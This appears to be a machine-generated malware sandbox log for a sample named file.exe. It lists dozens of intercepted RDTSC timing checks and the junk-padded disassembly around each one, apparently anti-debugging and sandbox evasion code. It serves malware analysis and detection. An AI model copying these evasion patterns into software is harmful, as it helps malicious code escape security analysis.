Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BEB7 second address: 81BEC6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B38DFD066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BEC6 second address: 81BECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BECB second address: 81BEE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD077h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81BEE7 second address: 81BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C008 second address: 81C03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD079h 0x00000009 jne 00007F6B38DFD066h 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6B38DFD06Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C03E second address: 81C044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C044 second address: 81C04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB54 second address: 81CB58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB58 second address: 81CB66 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6B38DFD066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81CB66 second address: 81CB80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F6B3885AF06h 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F6B3885AF06h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7690 second address: 7B7726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F6B38DFD077h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6B38DFD068h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D1F09h] 0x0000002e call 00007F6B38DFD06Fh 0x00000033 or edx, dword ptr [ebp+122D1B4Bh] 0x00000039 pop edi 0x0000003a mov ebx, dword ptr [ebp+12488720h] 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007F6B38DFD068h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a push ebx 0x0000005b mov edi, dword ptr [ebp+122D347Eh] 0x00000061 pop edx 0x00000062 add eax, ebx 0x00000064 or ecx, dword ptr [ebp+122D2CC2h] 0x0000006a nop 0x0000006b pushad 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D11C second address: 81D120 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D120 second address: 81D12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D12A second address: 81D12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D12E second address: 81D132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D132 second address: 81D138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D138 second address: 81D159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F6B38DFD077h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D159 second address: 81D15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D15D second address: 81D16B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D16B second address: 81D188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 jo 00007F6B3885AF06h 0x0000000e pop eax 0x0000000f jl 00007F6B3885AF0Ah 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D437 second address: 81D43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D43F second address: 81D443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81D6EF second address: 81D6F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82278F second address: 822795 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822795 second address: 82279E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82279E second address: 8227B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F6B3885AF06h 0x00000013 ja 00007F6B3885AF06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8227B7 second address: 8227BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8227BB second address: 8227D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8227D9 second address: 8227DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821BF7 second address: 821C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B3885AF19h 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821D83 second address: 821DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 jo 00007F6B38DFD066h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6B38DFD074h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 821DA8 second address: 821DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822325 second address: 822353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6B38DFD066h 0x0000000a jmp 00007F6B38DFD075h 0x0000000f popad 0x00000010 jng 00007F6B38DFD068h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822353 second address: 822359 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822359 second address: 822380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B38DFD077h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnp 00007F6B38DFD066h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 822380 second address: 822384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8224CC second address: 8224D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6B38DFD066h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8224D7 second address: 8224DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8224DD second address: 8224E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8224E1 second address: 8224FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a jng 00007F6B3885AF06h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F6B3885AF06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 826F18 second address: 826F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6B38DFD066h 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F6B38DFD076h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 830A76 second address: 830A7B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82EE26 second address: 82EE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Fh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F6B38DFD066h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82EE45 second address: 82EE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F273 second address: 82F279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F539 second address: 82F549 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6B3885AF06h 0x00000008 ja 00007F6B3885AF06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F7F5 second address: 82F7FF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6B38DFD066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F7FF second address: 82F805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F805 second address: 82F80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6B38DFD066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82F80F second address: 82F815 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82FA92 second address: 82FAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F6B38DFD066h 0x0000000a jl 00007F6B38DFD066h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82FAA2 second address: 82FAE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F6B3885AF22h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jne 00007F6B3885AF14h 0x00000017 jg 00007F6B3885AF0Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8344B7 second address: 8344BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8344BC second address: 8344DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F6B3885AF0Ah 0x0000000f push eax 0x00000010 jmp 00007F6B3885AF0Ch 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8344DD second address: 8344E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8344E4 second address: 834509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF10h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F6B3885AF0Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83B3BE second address: 83B3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83B3C4 second address: 83B3CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F6B3885AF06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84A00F second address: 84A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B38DFD06Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849F06 second address: 849F20 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6B3885AF15h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84CBAF second address: 84CBCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B38DFD075h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84CBCA second address: 84CBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84C8D2 second address: 84C8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84FD90 second address: 84FDA1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edi 0x00000008 pushad 0x00000009 jno 00007F6B3885AF06h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84FEDD second address: 84FEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84FEE1 second address: 84FF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B3885AF19h 0x0000000b pop edx 0x0000000c push eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F6B3885AF19h 0x00000015 jmp 00007F6B3885AF15h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84FF35 second address: 84FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6B38DFD066h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854BD7 second address: 854BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F6B3885AF06h 0x0000000c popad 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854BF0 second address: 854C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B38DFD074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 854C0C second address: 854C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85ED96 second address: 85EDB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F6B38DFD066h 0x00000009 jc 00007F6B38DFD066h 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F6B38DFD066h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EDB2 second address: 85EDCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B3885AF18h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EBE4 second address: 85EBEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EBEF second address: 85EC02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B3885AF0Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85EC02 second address: 85EC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F6B38DFD076h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 868563 second address: 868580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F6B3885AF18h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 868580 second address: 868593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push edi 0x0000000b jg 00007F6B38DFD066h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8670A6 second address: 8670B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007F6B3885AF06h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86722B second address: 867238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 867238 second address: 86723C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86723C second address: 867240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 867240 second address: 86724E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F6B3885AF12h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86724E second address: 867254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86750B second address: 867511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 867511 second address: 867515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 867515 second address: 86751B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86751B second address: 867524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 867524 second address: 867530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6B3885AF06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8676A9 second address: 8676AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8676AF second address: 8676B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86829B second address: 8682A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C877 second address: 86C893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F6B3885AF0Bh 0x0000000d je 00007F6B3885AF06h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C893 second address: 86C898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C898 second address: 86C8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6B3885AF06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86C8A4 second address: 86C8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F6B38DFD066h 0x0000000d jnc 00007F6B38DFD066h 0x00000013 rdtsc
